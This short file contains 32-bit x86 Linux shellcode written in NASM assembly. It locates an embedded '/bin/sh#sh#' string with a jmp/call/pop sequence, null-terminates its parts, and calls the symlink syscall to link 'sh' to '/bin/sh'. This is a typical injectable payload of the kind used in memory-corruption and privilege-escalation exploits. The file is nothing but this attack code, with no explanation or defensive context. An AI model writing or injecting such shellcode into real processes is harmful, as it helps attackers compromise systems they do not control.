BITS 32

jmp short	callit

doit:	

pop		esi
xor		eax, eax
mov byte	[esi + 7], al   ; terminate arg 1 
mov byte	[esi + 10], al  ; terminate arg 2 
mov byte	al, 83         ; the syscall symlink = 83 
lea		ebx, [esi]       
lea             ecx, [esi + 8]
int		0x80


callit:
call		doit

db		'/bin/sh#sh#'